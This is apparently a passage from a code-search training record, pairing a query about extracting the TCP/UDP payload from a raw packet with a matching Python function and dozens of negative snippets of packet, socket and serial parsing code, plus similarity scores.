"0.5247301", "0.524201", "0.5239726", "0.522892", "0.52223814", "0.52219385" ]
0.573576
29
Get the payload from a packet, the data below TCP/UDP basically
def payload_from_raw(raw, linktype=1):
    ip = iplayer_from_raw(raw, linktype)
    try:
        return ip.data.data
    except:
        return ""
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def get_tcp_packet_payload(pkt: dpkt.ethernet.Ethernet) -> bytes:\n eth = dpkt.ethernet.Ethernet(pkt)\n if isinstance(eth.data, dpkt.ip.IP) and isinstance(eth.data.data, dpkt.tcp.TCP):\n return eth.data.data.data", "def get_payload(raw_msg):\n\n return raw_msg[14:-6], raw_msg[-5]", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def payload(self):\n return self.raw_data[1:]", "def _icmp_parse_payload(pkt):\n\n payload = ''\n icmp_pkt = pkt.get_protocol(icmp.icmp)\n for char in icmp_pkt.data.data:\n payload+=(chr(char))\n parsed_payload = ast.literal_eval(payload.rstrip('\\0'))\n return(parsed_payload)", "def get_packet(self):\n msg_type = ''\n msg = ''\n try:\n msg_type = self.sock.recv(4)\n data = self.sock.recv(4)\n msg_len = int(struct.unpack('!L', data)[0])\n\n while len(msg) != msg_len:\n data = self.sock.recv(min(2048, msg_len - len(msg)))\n if not len(data):\n break\n msg += data\n\n if len(msg) != msg_len:\n return [None, None]\n\n except KeyboardInterrupt:\n raise\n except:\n traceback.print_exc()\n\n return Packet(type=msg_type, payload=json.loads(msg), handler=self.handler, connection=self)", "def get_tcp_packet_payload_len(pkt: dpkt.ethernet.Ethernet) -> int:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n return ip.len - (ip.hl * 4 + ip.data.off * 4)", "def recv_bundle(self):\n hdr_raw = sock_recv_raw(self.sock, 6, self.timeout)\n data_length, has_secondary = SPPPacketHeader.preparse_data_length(\n hdr_raw\n )\n data_plus_secondary = sock_recv_raw(\n self.sock,\n data_length,\n self.timeout,\n )\n packet, _ = SPPPacket.parse(\n hdr_raw + data_plus_secondary,\n timecode_used=True,\n has_crc=self.use_crc,\n )\n if self.use_crc:\n assert packet.crc_provided == packet.crc()\n return packet.payload", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... 
and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def decode_payload(self, bytes):\n packets = []\n while bytes:\n if six.byte2int(bytes[0:1]) <= 1:\n packet_len = 0\n i = 1\n while six.byte2int(bytes[i:i + 1]) != 255:\n packet_len = packet_len * 10 + six.byte2int(bytes[i:i + 1])\n i += 1\n packet_start = i+1\n else:\n bytes = bytes.decode('utf-8')\n i = bytes.find(b':')\n if i == -1:\n raise ValueError('Invalid payload')\n packet_len = int(bytes[0:i])\n packet_start = i+1\n\n packet = self.decode_packet(bytes[packet_start:packet_start+packet_len])\n packets.append(packet)\n bytes = bytes[packet_start+packet_len:]\n\n return packets", "def recvData(self) -> bytes:\n \n packet = self.recvPacket()\n if(packet.seq == Rudp.ackPlusOne(self.ack)):\n self.ack = Rudp.ackPlusOne(self.ack)\n self.acknowledgePacket(packet)\n return packet.payload\n else:\n return None", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif 
packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def payload_data(self, pkts):\n\n\t\t#Get all the payload bytes exchanged over MPTCP connections\n\t\tpayload_bytes = 0\n\t\tprint \"Determining the number of payload bytes excluding headers....\"\n\t\t#DSS = 0x2\n\t\tfor i in range(len(pkts)):\n\t\t\tif(TCPOption_MP in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 2 and Raw in pkts[i]):\n\t\t\t\tpayload_bytes += len(pkts[i][Raw].load)\n\t\t\t\t#print(\"DSN: %s; subflow_seqnum: %s; Data(bytes): %s\" % (pkts[i][TCPOption_MP].mptcp.dsn, pkts[i][TCPOption_MP].mptcp.subflow_seqnum, len(pkts[i][Raw].load)))\n\n\t\tprint \"Total Number of payload bytes in the file (entire MPTCP connections) excluding headers): %s\" % (payload_bytes)\n\t\t#MPTCP WITH SUBFLOW CONNECTIONS\n\t\t#MPTCP_JOINs = 0x1\n\t\tprint \"============================================================\"\n\t\tprint \"SUBFLOW Connections with their respective MPTCP connection (identified by connectionID)\"\n\t\tfor i in range(len(pkts)):\n\n\t\t\t#Initial Join Message\n\t\t\t#rcv_token Identifies the connection to which the subflow belongs: connectionID\n\t\t\tif(MPTCP_JoinSYN in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 1):\n\t\t\t\tprint(\"New subflow: connectionID: %s; src: %s; dest: %s; snd_nonce: %s\" % (pkts[i][TCPOption_MP].mptcp.rcv_token, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_nonce))\n\n\t\t#TODO: Now Need to track per-connection and per-subflow state", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def getPayload(self) -> int:\n ...", "def get_payload_length(packet):\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n return 188 - 4 - adaptation_field_len", "def getPayload(self):\n return self.__payload", "def get_udp_packet(self, sock, size=0):\n\n pkt = ''\n while True:\n buf = ''\n try:\n buf = sock.recvfrom(64)[0]\n except socket.timeout:\n break\n if size and len(pkt) >= size:\n break\n if not buf:\n break\n pkt += buf\n return pkt", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', 
res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def _read_packet(self, packet_id, data_bytes):\n self._serial_conn.send_command(_SENSORS_OPCODE+\" \"+str(packet_id))\n return self._serial_conn.read_data(data_bytes)", "def recv_packet(self):\r\n self.recv_bytes()\r\n\r\n packet_length_index = 0\r\n \r\n amount_data = len(self.recvBuffer) # available amount of data to read\r\n \r\n if amount_data <= packet_length_index: # just 0's in the buffer\r\n return None\r\n\r\n if len(self.recvBuffer) <= packet_length_index + 2: # length not received\r\n return None\r\n \r\n packet_length = unpack(self.recvBuffer, packet_length_index, 'H')\r\n \r\n if packet_length > len(self.recvBuffer): # packet not fully received\r\n return None\r\n \r\n if packet_length == 0: # some wrong generated packet by server, inc position of reading packet length\r\n packet_length_index += 1\r\n return None\r\n\r\n\t\t# extract packet data\r\n packet = self.recvBuffer[packet_length_index:packet_length_index+packet_length]\r\n\r\n # remaining recv buffer\r\n self.recvBuffer = self.recvBuffer[packet_length_index + packet_length:]\r\n packet_length_index = 0 # next packet length should be at pos 0 again\r\n\r\n return packet", "def get_tcp_packet(self, sock):\n\n # the first? byte indicates the fragment status (last fragament==1?)\n # after that goes the packet size\n pkt = ''\n try:\n while True:\n psize = ''\n while True:\n psize += sock.recv(1)\n if len(psize) == 4:\n break\n p0 = psize[0]\n psize = '\\0' + psize[1:4] # remove packet number\n psize = int(struct.unpack('!I', psize)[0])\n # read actual pkt\n while True:\n pkt += sock.recv(1)\n if len(pkt) == psize:\n break\n if binascii.hexlify(p0) == '80':\n break\n except socket.timeout:\n pass\n return pkt", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def read_udp_message(socket):\n data, address = socket.recvfrom(4096)\n data = data.decode('utf-8')\n return json.loads(data), address", "def from_network_layer(buffer):\r\n packet = buffer.get_packet()\r\n # print(f'buffer.message:{buffer.message}')\r\n # if packet == None:\r\n # print(f\"[from_network_layer] packet:NULL\")\r\n print(f\"[from_network_layer] packet:{packet}\")\r\n return packet", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def readpacket(self, n):\n try:\n msg = self.sock.recv(n)\n except BaseException:\n msg = ''\n return msg", "def GetPayload(self):\n return self.__Payload", "def get_tcp_packet_payload_len_with_options(pkt: dpkt.ethernet.Ethernet) -> int:\n if isinstance(pkt, dpkt.ethernet.Ethernet):\n ip = pkt.data\n elif isinstance(pkt, dpkt.ip.IP):\n ip = pkt\n else:\n return None\n return ip.len - ip.hl * 4 - 20", "def _receive_packet(self):\n report = self._serial_read(1)\n if len(report) != 1:\n self.log(\"ERROR: Didn't read back a report!\")\n report = -1\n else:\n report = report[0]\n retval = self._serial_read(1)\n if len(retval) != 1:\n self.log(\"ERROR: Didn't read back a return value!\")\n retval = -1\n else:\n retval = retval[0]\n\n return_payload_len = self._serial_read(1)\n if len(return_payload_len) != 1:\n self.log(\"ERROR: Didn't read back 
a return payload length!\")\n return_payload_len = 0\n else:\n return_payload_len = return_payload_len[0]\n\n if return_payload_len != 0:\n return_payload = self._serial_read(return_payload_len)\n else:\n return_payload = []\n checksum = self._serial_read(1)\n if len(checksum) != 1:\n self.log(\"ERROR: Didn't read back a checksum!\")\n checksum = -1\n else:\n checksum = checksum[0]\n\n data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload\n data.append(checksum)\n\n our_checksum = self.generate_checksum(data[:-1])\n if our_checksum != checksum:\n self.log(\"ERROR: Our checksum didn't calculate properly! \"\n \"(Calculated {}, expected {})\".format(our_checksum, checksum))\n return -1, checksum, []\n else:\n if self.verbose:\n self.log(\"Checksum match! ({} == {})\".format(our_checksum, checksum))\n\n return report, retval, return_payload", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). 
Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def recv(self):\r\n opcode, data = self.recv_data()\r\n return data", "def spoof_packet(packet):", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def _read_data(self, header):\n _, msg_size = unpack(self.HEADER_PACK_STR, header)\n with self.socket_lock:\n data = self.socket.recv(msg_size)\n return data", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def extract(self, packets):\n data = ''.join(data[3:63] for data in packets)\n return np.fromstring(data, dtype='<u2').astype('u4')", "def parse_packet(self, data):\n return data.decode().split('\\x00')", "def retrieveData():\n\n\t# My terribad first attempt at this based off of outflank example\n\t# I honestly have no idea what I was doing, but leaving it here just in case\n\t########\n\t# try:\n\t# \tdata = transSock.recv(4)\n\t# except:\n\t# \treturn(\"\")\n\t# if len(data) < 4:\n\t# \treturn()\n\t# slen = struct.unpack('<I', data)[0]\n\t# data = transSock.recv(slen)\n\t# while len(data) < slen:\n\t# \tdata = data + transSock.recv(slen - len(data))\n\t# return(data)\n\t########\n\n\t# Realizing that I have to unpack the buffer length first:\n\n\tframeSize = \"\"\n\twhile len(frameSize) != 4:\n\t\tframeSize = connSock.recv(4)\n\n\tdataSize = struct.unpack('<I', frameSize)[0]\n\tdata = 
connSock.recv(dataSize)\n\n\treturn data", "def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None", "def recv(self, socket):\n data = \"\"\n data_length = self.struct.unpack(socket.recv(4))[0]\n while len(data) < data_length:\n data += socket.recv(data_length - len(data))\n\n return data", "def read_socket( self ):\n incoming = self.conn.recv( 4096 )\n other = \"source\" if self.sink else \"sink\"\n self.test.info( \"received payload from %s <<<%s>>>\" % ( other,\n incoming ) )\n self.received_data += incoming", "def pull(self):\n \n data = self.s.recv(1024)\n if data:\n info = pickle.loads(data) \n \n return info.get(\"topic\"), info.get(\"value\")\n pass", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def payload(self):\n return self._payload", "def parameters(self):\n return self.pkt.payload[8:]", "def get_from_data_channel(self, sock):\n msg_rec = b\"\"\n # Continue reading from server until there's nothing left to read.\n while 1:\n buff = sock.recv(BUFF_SIZE)\n msg_rec += buff\n if len(buff) == 0:\n break\n self.logger.log(\"Received: %s\" % msg_rec)\n return msg_rec", "def receive_packet(self, packet):\n\t\treturn", "def getDataFromSocket(session):\n \n dat = \"\"\n while 1:\n message = session.recv(4096).decode()\n last=len(message)\n if message[last-1] == \"\\n\":\n dat=dat+message[:-1]\n return dat\n else:\n dat=dat+message", "def _finalize_packet(self, rudp_packet):\n return rudp_packet.to_bytes()", "def read(self):\n packet = None\n while packet is None:\n packet = self.async_read()\n return packet", "def packet(self):\n return self.server.packet(context=self.ctx)", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # 
generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def get_payload(self):\n self._payload_to_str()\n return self._str_payload", "def recvMsg(self):\n msgBytes, _ = self.sockUDP.recvfrom(can.CANMessage.size)\n msg = can.unpack(msgBytes)\n logger.debug(\"received: %r\", msg)\n return msg", "def receive(self) -> [Packet, None]:\n packet_size_data = self._stream.read(2)\n if not packet_size_data:\n return None\n packet_size = int.from_bytes(packet_size_data, 'little')\n packet_data = self._stream.read(packet_size)\n return packet_from_bytes(packet_data)", "def recv_data(self):\n data = \"\"\n size = 0\n\n try:\n size = self.sockObj.recv(4) #Get metadata\n except:\n raise Exception(\"Error while receiving data. Probably broken pipe\")\n\n if len(size) == 0:\n raise Exception(\"No data recivied. Probably broken pipe\")\n\n size = struct.unpack('>I',size)[0]\n\n data = self.sockObj.recv(size)\n\n if len(data) != size:\n raise Exception(\"Partiala data recivied\")\n\n return self.decode(data)", "def process_udp_packet(self, packet_data, packet_source):\n # Add your logic here, after your logic is done,\n # add the packet to be sent to self.packet_buffer\n # feel free to remove this line\n print(f\"Received a packet from {packet_source}\")\n in_packet = self._parse_udp_packet(packet_data)\n out_packet = self._do_some_logic(in_packet)\n\n # This shouldn't change.\n self.packet_buffer.append(out_packet)\n\n return in_packet", "def recibir(self):\r\n lenbuf = self.__recvall(4)\r\n longitud, = struct.unpack('!I', lenbuf)\r\n return self.__recvall(longitud)", "def get_pkt(self):\n return self.pkt", "def recvPacket(self) -> Rudp.Packet:\n (packet, validity, c) = self.recv()\n if(c != self.client):\n raise Rudp.WrongClient(\"Wrong Package from \" + c)\n return packet", "def get_data(self):\n\n data = self.socket.recv(BUFFER_SIZE)\n\n if not data:\n return None\n\n if len(data) == BUFFER_SIZE:\n while True:\n try:\n data += self.socket.recv(BUFFER_SIZE)\n except:\n break\n \n return data", "def get_net_message():\n # TODO: refactor to use a list of events encoded using masgpack?\n try:\n message, address = serverSocket.recvfrom(1024)\n except:\n return None, None\n message = message.decode('utf-8')\n return message, address", "def recv(self):\n self.buf = self.sock_in.recvfrom(65565)\n p = Packet(data=self.buf)\n return p", "def receive(self):\n raw_msglen = self.recvall(4)\n if not raw_msglen:\n return None\n msglen = stc.unpack('>I', raw_msglen)[0]\n # Read the message data\n return self.recvall(msglen)", "def parameters(self):\n return self.pkt.payload[3:]", "def parameters(self):\n return self.pkt.payload[3:]", "def parameters(self):\n return self.pkt.payload[3:]", "def recieve_data(self):\r\n try:\r\n while True:\r\n try:\r\n data, self.addr = self.sock.recvfrom(1024)\r\n return data\r\n except socket.timeout:\r\n print(\"There is no packet at all!\")\r\n break\r\n except Exception:\r\n print(\"Can't recieve a package\")", "def receive(self):\n data = self.socket.recv(4096)\n return data", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! 
(expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def recv(self) -> tuple:\n (data, c) = self.socket.recvfrom(Rudp.Packet.buffer())\n # print(data)\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity):\n print(\"Valid Packet Received From: \", c)\n else:\n raise Rudp.InvalidPacket(\"Invalid Packet Received\")\n\n return (packet, validity, c)", "def _pop_received_packet(self):\n fragments = self._receive_heap.pop_min_and_all_fragments()\n if fragments is None:\n self._attempt_disabling_looping_receive()\n else:\n last_seqnum = fragments[-1].sequence_number\n self._update_next_expected_seqnum(last_seqnum)\n self._update_next_delivered_seqnum(last_seqnum)\n payload = b''.join(f.payload for f in fragments)\n self.handler.receive_message(payload)\n\n if self._next_delivered_seqnum not in self._receive_heap:\n self._attempt_disabling_looping_receive()", "def read_data(self):\r\n # Verify length of response data\r\n length = self.read_until_null()\r\n message = self.read_until_null()\r\n if int(length) == len(message):\r\n return message\r\n else:\r\n raise ProtocolException(\"Length mismatch encountered while reading the Xdebug message\")", "def handle_packet(self, packet, udp_dport):\n return 